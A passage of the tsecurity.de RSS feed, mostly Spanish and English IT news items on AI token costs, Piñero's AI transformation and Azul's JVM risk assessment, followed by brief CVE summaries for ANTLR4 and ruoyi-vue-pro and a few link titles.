<description><![CDATA[Debido a que las herramientas y servicios de IA generativa se han vuelto tan ubicuos (y populares), los costes de utilizarlos se están disparando, lo que lleva a un apetito insaciable por los tokens.



Éstos representan una forma común de medir y fijar el precio del uso de la IA. Al igual que la...]]></description>
<link>https://tsecurity.de/de/3634947/it-nachrichten/cmo-las-empresas-compiten-por-resolver-el-problema-de-los-tokens-de-ia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634947/it-nachrichten/cmo-las-empresas-compiten-por-resolver-el-problema-de-los-tokens-de-ia/</guid>
<pubDate>Tue, 30 Jun 2026 10:32:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Debido a que las herramientas y servicios de IA generativa se han vuelto tan ubicuos (y populares), los costes de utilizarlos se están disparando, lo que lleva a un apetito insaciable por los <em>tokens</em>.</p>



<p>Éstos representan una forma común de medir y fijar el precio del uso de la IA. Al igual que las letras y palabras en inglés, los grandes modelos de lenguaje (LLM) comprenden una frase o consulta descomponiendo las palabras en <em>tokens</em>.</p>



<p>Con la explosión de la IA ya en pleno desarrollo, los <em>tokens</em> son ahora “las unidades fundamentales de datos que procesan nuestros modelos, muchas de las cuales representan un problema que se está resolviendo”, según el CEO de Google, Sundar Pichai. (Por cierto, procesa alrededor de 3,2 cuatrillones de <em>tokens</em> al mes).</p>



<p>Pero a medida que el precio de todos esos <em>tokens</em> se acumula, los ejecutivos de negocio y TI están buscando formas de reducir costes mientras mantienen alta la productividad corporativa. El uso descontrolado de <em>tokens </em>ya le ha supuesto a una empresa una factura inesperada de 500 millones de dólares en IA.</p>



<p>Existen varias maneras de que las empresas controlen el precio de la IA a nivel de modelo, infraestructura, silicio y negocio. A continuación, un vistazo a cómo podrían lograrse algunos de esos ahorros.</p>



<h2 class="wp-block-heading">Cambiar a modelos de menor coste</h2>



<p>Una forma potencial de ahorrar dinero es redirigir el trabajo de IA a un modelo más barato, dijo Pichai. En Google, ese sería Gemini 3.5 Flash. Ofrece “capacidades de nivel de frontera a menos de la mitad del precio de modelos de frontera comparables”.</p>



<p>“Si las empresas usan una combinación de [Gemini 3.5] Flash y otros modelos de frontera, podrían ahorrar mucho dinero”, afirmó el CEO de Google.</p>



<p>Ese tipo de modelos proporciona <em>tokens</em> más baratos, con un razonamiento suficientemente bueno para muchos usuarios, aunque no tan potente como el Gemini 3.5 principal, para ofrecer resultados útiles.</p>



<p>“A veces hay un exceso con los [LLM]”, —sostiene Deepak Seth, director analista senior de Gartner—. No siempre necesito un gran modelo de lenguaje que haya sido entrenado con las obras de Charles Dickens, Shakespeare y Harry Potter”.</p>



<p>Steven Dickens, analista principal de Hyperframe Research, no deja de usar Quick de Amazon, que cuesta 20 dólares al mes, para tareas personales. “Tiene un gran retorno personal de la inversión, ya que no sólo ha hecho las tareas más rápidas, sino que ha desbloqueado tareas que nunca habría intentado antes”, explica.</p>



<h2 class="wp-block-heading">No olvide la parte de hardware y software de la ecuación</h2>



<p>La crisis de los <em>tokens </em>no es nueva, en opinión de Dheeraj Pandey, CEO de DevRev. Compara lo que sucede ahora en el mercado de la IA con las disrupciones que surgieron con la llegada de la computación en la nube y la virtualización hace años.</p>



<p>“Dejamos que el caos reinara y luego tuvimos que controlarlo” —dice Pandey—. “La palabra que la gente empezó a usar fue consolidación de servidores y virtualización”.</p>



<p>En su opinión, la respuesta al problema de los <em>tokens</em> es la misma: “Cualquier cosa en sistemas se puede resolver con caché e indirección”.</p>



<p>Por ejemplo, DevRev está construyendo una capa de memoria entre los agentes de IA y las fuentes de datos principales, como Salesforce o registros de ERP; esto puede reducir la carga de <em>tokens</em> y hacer más eficiente el movimiento de datos. La capa mantiene un grafo de conocimiento con respuestas a preguntas comunes de los agentes y funciona sobre CPU más baratas, evitando ciclos de GPU más costosos.</p>



<p>Enviar agentes directamente a sistemas como ServiceNow y Salesforce “consumirá muchos más <em>tokens</em>. Además, no es preciso. Y, por último, no es lo suficientemente seguro como para poder revertirlo en caso de que un agente cometa un error”, reconoce Pandey.</p>



<p>NetBrain, especialista en automatización de redes, utiliza un método distinto: emplea computación convencional para mapear la estructura de una red y luego proporciona solo información clave a los modelos para la planificación y el razonamiento, donde la IA destaca. “Así no tienes que gastar todos los tokens”, tal y como explica su CTO, Song Pang.</p>



<h2 class="wp-block-heading">Centrarse en la eficiencia de los ‘prompts’</h2>



<p>La empresa de dotación de personal ManpowerGroup ha descubierto que la eficiencia de los <em>prompts</em> puede ser una herramienta eficaz para mejorar el uso de<em> tokens</em>, tanto internamente como externamente para los clientes.</p>



<p>Por ejemplo, los usuarios que accedían a su herramienta interna de mercado laboral inicialmente necesitaban 10 preguntas de seguimiento para profundizar en una consulta. Un año después, un uso más eficiente de los <em>prompts</em> ha reducido ese número a una media de cuatro, explica Max Leaming, responsable de ciencia de datos y soluciones de IA en ManpowerGroup.</p>



<p>Según Leaming, “están usando menos <em>tokens </em>y son simplemente más eficientes. Y eso en gran parte tiene que ver con tu capacidad para formular <em>prompts</em> de manera eficiente”.</p>



<h2 class="wp-block-heading">Apuesta por lo local</h2>



<p>El nuevo hardware de IA que genera<em> tokens</em> gratis en casa podría aliviar parte de la crisis de costes.</p>



<p>Nvidia y Microsoft presentaron RTX Spark a principios de este mes en el En el GTC Taipei. Se trata de un PC de escritorio con IA agente que ejecuta agentes y modelos de 120.000 millones de parámetros localmente en Windows. El objetivo es “ofrecer inteligencia sin medición a cada hogar y cada escritorio con Windows”, dijo el CEO de Microsoft, Satya Nadella, en un comunicado.</p>



<p>Algunas empresas buscan reducir los costes de la IA en la nube instalando su propio hardware en centros de datos, con proveedores como HPE y Dell que ofrecen servidores instalados en instalaciones independientes. (La IA <em>on</em><em>‑premise</em> está ganando terreno en medio de preocupaciones sobre la IA soberana y tensiones geopolíticas, incluido el reciente conflicto en Oriente Medio, donde grandes centros de datos fueron alcanzados por misiles).</p>



<p>Max Goss, director analista senior de Gartner, defiende que “existen soluciones de IA locales, específicas por región y de múltiples proveedores. Todo eso puede ayudar a mitigar el riesgo. Pero no lo va a eliminar”.</p>



<h2 class="wp-block-heading">Usar ingenieros desplegados en cliente</h2>



<p>Reducir los costes de <em>tokens</em> es algo que podría recaer en ingenieros desplegados en cliente (FDE) en los entornos de los clientes, tal y como cree Taimur Rashid, director gerente del Centro de Innovación en IA Generativa de AWS.</p>



<p>A su juicio, “espero que estos equipos sean capaces de diseñar sistemas teniendo en cuenta esos requisitos de coste, ya sea usar un modelo diferente o un caso de uso distinto que no incremente el coste por <em>token</em>”.</p>



<p>Y añade: “Las empresas pueden gastar mucho en consumo de <em>tokens</em>, pero si estás generando ingresos, siempre que la economía cuadre, entonces estás tranquilo”.</p>



<p>El uso de FDE está creciendo a medida que los responsables de TI buscan desplegar implementaciones de IA exitosas mientras mantienen el control de los costes.</p>



<h2 class="wp-block-heading">Cambiar la medida del éxito de ‘tokens’ a resultados</h2>



<p>Incluso con el énfasis actual en reducir el uso de <em>tokens</em> para ahorrar dinero, es probable que las métricas utilizadas para medir el éxito de la IA cambien, defiende Seth, de Gartner. En algún momento, la tarificación basada en <em>tokens</em> evolucionará hacia un modelo más basado en resultados, donde la unidad de valor sean los resultados, no fragmentos de palabras.</p>



<p>“Algunas empresas están avanzando hacia una tarificación basada en resultados. Cuando la gente empiece a darse cuenta del coste real de los <em>tokens</em>, entonces las empresas empezarán a centrarse en la eficiencia de los <em>tokens</em>”,  concluye el analista.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Piñero impulsa una nueva etapa de su transformación digital con una IA integrada en el negocio]]></title>
<description><![CDATA[El turismo vive una profunda transformación impulsada por un nuevo perfil del cliente. Hoy los viajeros ya no buscan únicamente un destino o un hotel; demandan experiencias personalizadas, respuestas inmediatas y una relación fluida con las marcas antes, durante y después de cada viaje.



Para g...]]></description>
<link>https://tsecurity.de/de/3634946/it-nachrichten/piero-impulsa-una-nueva-etapa-de-su-transformacin-digital-con-una-ia-integrada-en-el-negocio/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634946/it-nachrichten/piero-impulsa-una-nueva-etapa-de-su-transformacin-digital-con-una-ia-integrada-en-el-negocio/</guid>
<pubDate>Tue, 30 Jun 2026 10:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>El turismo vive una <a href="https://www.cio.com/article/4029537/la-digitalizacion-del-sector-turismo-pasa-por-cuidar-el-dato.html">profunda transformación</a> impulsada por un nuevo perfil del cliente. Hoy los viajeros ya no buscan únicamente un destino o un hotel; demandan experiencias personalizadas, respuestas inmediatas y una relación fluida con las marcas antes, durante y después de cada viaje.</p>



<p>Para grupos como Piñero, compañía española con más de 50 años de experiencia en el sector del turismo, <em>real estate</em> y <em>hospitality</em>, responder a estas nuevas expectativas ha supuesto mucho más que incorporar tecnología. Ha implicado transformar la forma de operar, tomar decisiones y relacionarse con sus clientes. “La transformación digital está plenamente integrada en la estrategia corporativa. Hemos evolucionado desde iniciativas aisladas hacia un modelo transversal donde la tecnología actúa como habilitador clave del negocio, la eficiencia y la experiencia del cliente”, explica Antonio Muñoz, director de TI de Piñero.</p>



<h2 class="wp-block-heading">Ocho años acelerando la transformación</h2>



<p>Aunque la innovación tecnológica forma parte de la evolución natural de la compañía, el proceso de transformación digital se aceleró formalmente hace aproximadamente ocho años. Según explica Muñoz, el objetivo era doble: “Modernizar nuestra arquitectura tecnológica y dotar al grupo de capacidades digitales que impulsaran eficiencia, integración y una relación más directa y personalizada con el cliente”. Un proceso que, asegura, ha estado ligado al propio crecimiento de la organización. “Estos procesos de transformación forman parte de nuestro ADN como compañía y han venido acompañando al crecimiento empresarial de una manera muy cercana”.</p>



<p>Como ocurre en cualquier proceso de transformación, el camino no ha estado exento de desafíos. Entre los principales retos, el responsable de TI destaca “la gestión del cambio cultural, la convivencia entre sistemas <em>legacy</em>, la implementación de nuevas plataformas <em>cloud</em> y la necesidad de reforzar el talento digital y el gobierno del dato en un entorno multinacional”.</p>



<p>Aun así, la evolución tecnológica de Piñero durante los últimos años ha sido profunda. “Hemos evolucionado desde un entorno fragmentado y <em>on premise</em> hacia una arquitectura orientada a servicios, <em>cloud </em>y datos”, resume Muñoz.</p>



<p>Actualmente, la compañía opera sobre una arquitectura híbrida con un peso creciente de la nube, plataformas de integración y un <em>Data Platform</em> corporativo. Una transformación que ha venido acompañada de importantes cambios estructurales, entre ellos la implantación de plataformas de integración, la creación de una plataforma corporativa de datos y la estandarización de herramientas de productividad y colaboración.</p>



<p>Todo ello ha cambiado el papel que desempeña la tecnología dentro de la organización, pasando de ser “un soporte operativo a convertirse en una palanca estratégica, generadora de nuevas capacidades comerciales, analíticas y de servicio”, afirma el director de TI.</p>



<h2 class="wp-block-heading">Una estrategia común para negocios muy diferentes</h2>



<p>Uno de los retos más importantes de la compañía es articular una estrategia tecnológica coherente para negocios con necesidades distintas. Para lograrlo, el grupo ha construido una misma base tecnológica. “La estrategia se articula sobre unas redes troncales tecnológicas comunes —datos, integración, seguridad, identidad— sobre las que cada unidad despliega soluciones específicas. Este modelo garantiza coherencia, escalabilidad y reutilización de capacidades en todo el grupo”, explica Muñoz.</p>



<p>La digitalización no solo está transformando los procesos internos de la compañía, sino también la relación con los clientes. Al mismo tiempo, el dato se ha convertido en uno de sus principales activos estratégicos, apoyándose en herramientas de <em>business intelligence</em>, <em>machine learning</em> y analítica avanzada para convertir la información en decisiones y acciones concretas. “La ventaja competitiva de verdad sale de nuestros datos y de cómo los convertimos mediante algoritmos avanzados en decisiones y acciones que nos ayuden a ser más sostenibles en todos los ámbitos”, señala Muñoz.</p>



<figure class="wp-block-pullquote"><blockquote><p><em><strong>“Nuestro foco hoy es industrializar la IA”, apunta Antonio Muñoz, director de TI de Piñero</strong></em></p></blockquote></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/ANTONIO-MUNOZ-IT-DIRECTOR-PINERO.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Antonio Muñoz, director de TI de Grupo Piñero" class="wp-image-4190950" width="1024" height="822" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Grupo Piñero</p></div>



<h2 class="wp-block-heading">La inteligencia artificial pasa de la experimentación a la operación</h2>



<p>Tras años construyendo los cimientos tecnológicos de la organización, la inteligencia artificial se ha convertido en una de las principales prioridades de Piñero, aunque, en los últimos años, el enfoque ha cambiado. “Nuestro foco hoy es industrializar la IA. Ya no estamos en una fase de probar cosas: estamos integrándola en procesos reales. La gran palanca es la IA generativa y, sobre todo, los flujos agénticos: sistemas que coordinan pasos, conectan datos y herramientas y optimizan procesos completos”.</p>



<p>La nueva herramienta tiene un objetivo muy definido: ayudar a los equipos comerciales y de <em>back office</em> a trabajar con toda la información relevante de propiedades y precios de forma unificada y contextualizada. “Esta herramienta permite a nuestros equipos contestar mejor, con más contexto, más coherencia y con una capacidad de decisión más precisa, independientemente del canal por el que llegue la petición de información”, explica Muñoz.</p>



<p>El sistema cuenta con un profundo conocimiento del catálogo de propiedades y del contexto de cada cliente, lo que, según el director de TI, permite “recomendar, comparar y comunicar mejor que nunca, con respuestas personalizadas y coherentes en todos nuestros canales”.</p>



<p>Desde el punto de vista tecnológico, la solución cuenta con “una combinación muy pragmática: IA generativa y una arquitectura multiagente, con varios agentes especializados que se coordinan para entender la consulta, buscar el contexto y construir una respuesta útil”, explica Muñoz.</p>



<p>De acuerdo con el director de TI, la diferencia respecto a otros asistentes radica en su integración con los sistemas internos de la organización: “Lo diferencial es que no es IA aislada: está integrada con las fuentes internas de la división para unificar información de propiedades, precios e históricos, y además se conecta a los canales donde trabaja el equipo —correo y WhatsApp— para generar respuestas personalizadas y comparativas/recomendaciones en tiempo real”.</p>



<p>Uno de los principales beneficios de este asistente es la reducción del tiempo dedicado a tareas repetitivas. “Esperamos liberar en torno a un 20-30% del tiempo del equipo en tareas repetitivas —buscar información, cruzar datos, preparar comparativas o redactar respuestas— para que puedan dedicarse más a tareas de valor, como el seguimiento y asesoramiento comercial”, comenta Muñoz.</p>



<p>Pero el objetivo no es sustituir el papel de las personas, sino potenciarlo. “Reduce gran parte del trabajo manual de buscar, cruzar y preparar información. Deja una propuesta prácticamente lista, y el paso final (criterio, matiz, decisión y cierre comercial) lo da la persona, que es donde está el verdadero valor”.</p>



<h2 class="wp-block-heading">Una tecnología llamada a extenderse</h2>



<p>El asistente de Real Estate &amp; Golf no será una iniciativa aislada, comenta Muñoz. “Este asistente no aparece de la nada: forma parte de una línea de trabajo que ya venimos desarrollando en el Grupo con asistentes y soluciones de IA en otras áreas”. La intención es extender estas capacidades al resto de negocios y seguir ampliando la arquitectura con nuevas fuentes de información, procesos y canales.</p>



<p>La hoja de ruta tecnológica de Piñero pasa por seguir escalando la inteligencia artificial, reforzar el gobierno del dato y acelerar la innovación aplicada al negocio. Para Muñoz, el gran reto será convertir a la organización en una compañía plenamente orientada al dato: “La mayor transformación vendrá de la capacidad de convertirnos en una organización data driven, donde la inteligencia artificial y la automatización impulsen decisiones, eficiencia y personalización a gran escala”.</p>



<p>Una visión que refleja cómo la tecnología ha dejado de ser un área de soporte para convertirse en uno de los principales motores de crecimiento y transformación del grupo.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Azul offers free JVM vulnerability risk assessment]]></title>
<description><![CDATA[Azul has introduced free vulnerability risk assessment for Java virtual machines (JVMs). Citing AI models such as Claude Mythos, which can automatically discover vulnerabilities and create exploits long before they’re disclosed, the company says it aims to address the blind spots that these auton...]]></description>
<link>https://tsecurity.de/de/3634274/ai-nachrichten/azul-offers-free-jvm-vulnerability-risk-assessment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634274/ai-nachrichten/azul-offers-free-jvm-vulnerability-risk-assessment/</guid>
<pubDate>Tue, 30 Jun 2026 02:02:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Azul has introduced free vulnerability risk assessment for <a href="https://www.infoworld.com/article/2269370/what-is-the-jvm-introducing-the-java-virtual-machine.html" data-type="link" data-id="https://www.infoworld.com/article/2269370/what-is-the-jvm-introducing-the-java-virtual-machine.html">Java virtual machines</a> (JVMs). Citing AI models such as Claude Mythos, which can automatically discover vulnerabilities and create exploits long before they’re disclosed, the company says it aims to address the blind spots that these autonomous AI-powered exploitation tools are able to find.</p>



<p>Users can request the <a href="https://www.azul.com/jvm-vulnerability-risk-assessment/" data-type="link" data-id="https://www.azul.com/jvm-vulnerability-risk-assessment/">free JVM vulnerability risk assessment at Azul’s website</a>. To counter AI-driven exploits, Azul’s assessment maps discovered JVM vulnerabilities directly to Stable Critical Patch Updates (CPUs), which are security-only patches that can be dropped into live production environments immediately without the risk of breaking software, Azul said. </p>



<p>Announced June 17, Azul’s free JVM risk vulnerability assessment is available at no cost, direct from Azul and via select Azul partners, the company said. In a single engagement, organizations receive the following: </p>



<ul class="wp-block-list">
<li>Executive-ready security dashboard: A visual summary of the entire Java estate, broken down by risk tier, publisher, and Java version — designed for CxO-level consumption and board reporting. </li>



<li>Risk-by-version breakdown: Identification of the specific Java versions driving the highest exposure, so remediation effort can be directed where it matters most rather than spread uniformly. </li>



<li>Key Risk Indicators (KRIs) for AI-driven exploits: Visibility into which JVMs carry active Known Exploited Vulnerability (KEV) exposure — the highest-priority threat class recognized in the US government’s CISA KEV catalog — as well as which instances are end-of-life or running below the current patch baseline. </li>



<li>Prioritized remediation roadmap<strong>:</strong> Concrete next steps ranked by impact, including which workloads to patch first, which to migrate off unsupported runtimes, and how to address extended support needs for legacy environments that cannot be immediately modernized. </li>
</ul>



<p>In the current risk environment, where autonomous AI systems continuously discover new vulnerabilities or chain together previously known CVEs into exploits, the pace of standard patch deployment is no longer sufficient, Azul said. The company said its free JVM vulnerability risk assessment is purpose-built for this environment.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13528 | YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.04-jdk8-SNAPSHOT AppFileController File Upload Endpoint FileServiceImpl.java generateUploadPath path traversal (Issue 1146 / EUVD-2026-40025)]]></title>
<description><![CDATA[A vulnerability was found in YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.04-jdk8-SNAPSHOT. It has been rated as critical. The impacted element is the function generateUploadPath of the file yudao-module-infra/src/main/java/cn/iocoder/yudao/module/infra/service/file/FileServiceImpl.java of the c...]]></description>
<link>https://tsecurity.de/de/3632216/sicherheitsluecken/cve-2026-13528-yunaivzhijiantianya-ruoyi-vue-pro-up-to-202604-jdk8-snapshot-appfilecontroller-file-upload-endpoint-fileserviceimpljava-generateuploadpath-path-traversal-issue-1146-euvd-2026-40025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632216/sicherheitsluecken/cve-2026-13528-yunaivzhijiantianya-ruoyi-vue-pro-up-to-202604-jdk8-snapshot-appfilecontroller-file-upload-endpoint-fileserviceimpljava-generateuploadpath-path-traversal-issue-1146-euvd-2026-40025/</guid>
<pubDate>Mon, 29 Jun 2026 09:36:38 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/yunaiv:ruoyi-vue-pro">YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.04-jdk8-SNAPSHOT</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. The impacted element is the function <code>generateUploadPath</code> of the file <em>yudao-module-infra/src/main/java/cn/iocoder/yudao/module/infra/service/file/FileServiceImpl.java</em> of the component <em>AppFileController File Upload Endpoint</em>. Performing a manipulation results in path traversal.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-13528">CVE-2026-13528</a>. Remote exploitation of the attack is possible. Furthermore, an exploit is available.

It is recommended to apply a patch to fix this issue.

This product is published by multiple vendors.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13503 | antlr ANTLR4 up to 4.13.2 tokenVocab Grammar Option TokenVocabParser.java getImportedVocabFile path traversal (EUVD-2026-40001)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in antlr ANTLR4 up to 4.13.2. Affected by this issue is the function getImportedVocabFile of the file tool/src/org/antlr/v4/parse/TokenVocabParser.java of the component tokenVocab Grammar Option Handler. The manipulation results in path traversal...]]></description>
<link>https://tsecurity.de/de/3631414/sicherheitsluecken/cve-2026-13503-antlr-antlr4-up-to-4132-tokenvocab-grammar-option-tokenvocabparserjava-getimportedvocabfile-path-traversal-euvd-2026-40001/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631414/sicherheitsluecken/cve-2026-13503-antlr-antlr4-up-to-4132-tokenvocab-grammar-option-tokenvocabparserjava-getimportedvocabfile-path-traversal-euvd-2026-40001/</guid>
<pubDate>Sun, 28 Jun 2026 20:40:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/antlr:antlr4">antlr ANTLR4 up to 4.13.2</a>. Affected by this issue is the function <code>getImportedVocabFile</code> of the file <em>tool/src/org/antlr/v4/parse/TokenVocabParser.java</em> of the component <em>tokenVocab Grammar Option Handler</em>. The manipulation results in path traversal.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-13503">CVE-2026-13503</a>. The attack can be executed remotely. Additionally, an exploit exists.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13502 | antlr ANTLR4 up to 4.13.2 Maven Plugin GrammarDependencies.java ObjectInputStream.readObject toctou (EUVD-2026-40000)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in antlr ANTLR4 up to 4.13.2. This affects the function ObjectInputStream.readObject of the file antlr4-maven-plugin/src/main/java/org/antlr/mojo/antlr4/GrammarDependencies.java of the component Maven Plugin. This manipulation causes time-of...]]></description>
<link>https://tsecurity.de/de/3631413/sicherheitsluecken/cve-2026-13502-antlr-antlr4-up-to-4132-maven-plugin-grammardependenciesjava-objectinputstreamreadobject-toctou-euvd-2026-40000/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631413/sicherheitsluecken/cve-2026-13502-antlr-antlr4-up-to-4132-maven-plugin-grammardependenciesjava-objectinputstreamreadobject-toctou-euvd-2026-40000/</guid>
<pubDate>Sun, 28 Jun 2026 20:40:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/antlr:antlr4">antlr ANTLR4 up to 4.13.2</a>. This affects the function <code>ObjectInputStream.readObject</code> of the file <em>antlr4-maven-plugin/src/main/java/org/antlr/mojo/antlr4/GrammarDependencies.java</em> of the component <em>Maven Plugin</em>. This manipulation causes time-of-check time-of-use.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-13502">CVE-2026-13502</a>. The attack is restricted to local execution. Moreover, an exploit is present.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13501 | antlr ANTLR4 up to 4.13.2 gofmt GoTarget.java GoTarget command injection (EUVD-2026-39999)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in antlr ANTLR4 up to 4.13.2. Affected by this vulnerability is the function GoTarget of the file tool/src/org/antlr/v4/codegen/target/GoTarget.java of the component gofmt. The manipulation leads to command injection.

This vulnerability is...]]></description>
<link>https://tsecurity.de/de/3631410/sicherheitsluecken/cve-2026-13501-antlr-antlr4-up-to-4132-gofmt-gotargetjava-gotarget-command-injection-euvd-2026-39999/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631410/sicherheitsluecken/cve-2026-13501-antlr-antlr4-up-to-4132-gofmt-gotargetjava-gotarget-command-injection-euvd-2026-39999/</guid>
<pubDate>Sun, 28 Jun 2026 20:40:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/antlr:antlr4">antlr ANTLR4 up to 4.13.2</a>. Affected by this vulnerability is the function <code>GoTarget</code> of the file <em>tool/src/org/antlr/v4/codegen/target/GoTarget.java</em> of the component <em>gofmt</em>. The manipulation leads to command injection.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-13501">CVE-2026-13501</a>. The attack can only be performed from a local environment. Furthermore, an exploit is available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13500 | antlr ANTLR4 up to 4.13.2 Grammar Action Block OutputFile.java code injection (EUVD-2026-39998)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in antlr ANTLR4 up to 4.13.2. Affected is an unknown function of the file tool/src/org/antlr/v4/codegen/model/OutputFile.java of the component Grammar Action Block Handler. Executing a manipulation can lead to code injection.

The identi...]]></description>
<link>https://tsecurity.de/de/3631409/sicherheitsluecken/cve-2026-13500-antlr-antlr4-up-to-4132-grammar-action-block-outputfilejava-code-injection-euvd-2026-39998/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631409/sicherheitsluecken/cve-2026-13500-antlr-antlr4-up-to-4132-grammar-action-block-outputfilejava-code-injection-euvd-2026-39998/</guid>
<pubDate>Sun, 28 Jun 2026 20:39:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/antlr:antlr4">antlr ANTLR4 up to 4.13.2</a>. Affected is an unknown function of the file <em>tool/src/org/antlr/v4/codegen/model/OutputFile.java</em> of the component <em>Grammar Action Block Handler</em>. Executing a manipulation can lead to code injection.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-13500">CVE-2026-13500</a>. The attack may be launched remotely. Furthermore, there is an exploit available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub - iss4cf0ng/NebulaPulsar: NebulaPulsar is a proof-of-concept in-memory implant framework for Java (JSP) and ASP.NET (ASPX/ASHX/ASMX) webshells, originally developed as part of the Alien project.]]></title>
<description><![CDATA[submitted by    /u/AcrobaticMonitor9992   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3631311/reverse-engineering/github-iss4cf0ngnebulapulsar-nebulapulsar-is-a-proof-of-concept-in-memory-implant-framework-for-java-jsp-and-aspnet-aspxashxasmx-webshells-originally-developed-as-part-of-the-alien-project/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631311/reverse-engineering/github-iss4cf0ngnebulapulsar-nebulapulsar-is-a-proof-of-concept-in-memory-implant-framework-for-java-jsp-and-aspnet-aspxashxasmx-webshells-originally-developed-as-part-of-the-alien-project/</guid>
<pubDate>Sun, 28 Jun 2026 19:08:30 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/AcrobaticMonitor9992"> /u/AcrobaticMonitor9992 </a> <br> <span><a href="https://github.com/iss4cf0ng/NebulaPulsar">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1uhn607/github_iss4cf0ngnebulapulsar_nebulapulsar_is_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[EWE AG senkt Java-Lizenzkosten um 60 Prozent nach Migration - silicon.de]]></title>
<description><![CDATA[Cybersicherheit · Deals · Innovation trifft Zero Trust: Aston Martin setzt auf Zscaler. Das Formel 1-Team von Aston Martin Aramco schützt Daten mit ...]]></description>
<link>https://tsecurity.de/de/3629999/it-security-nachrichten/ewe-ag-senkt-java-lizenzkosten-um-60-prozent-nach-migration-siliconde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629999/it-security-nachrichten/ewe-ag-senkt-java-lizenzkosten-um-60-prozent-nach-migration-siliconde/</guid>
<pubDate>Sat, 27 Jun 2026 20:13:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Cybersicherheit</b> · Deals · Innovation trifft Zero Trust: Aston Martin setzt auf Zscaler. Das Formel 1-Team von Aston Martin Aramco schützt Daten mit ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Hacking Smart Cities One Building At A Time - A City Of A Thousand Zero Days]]></title>
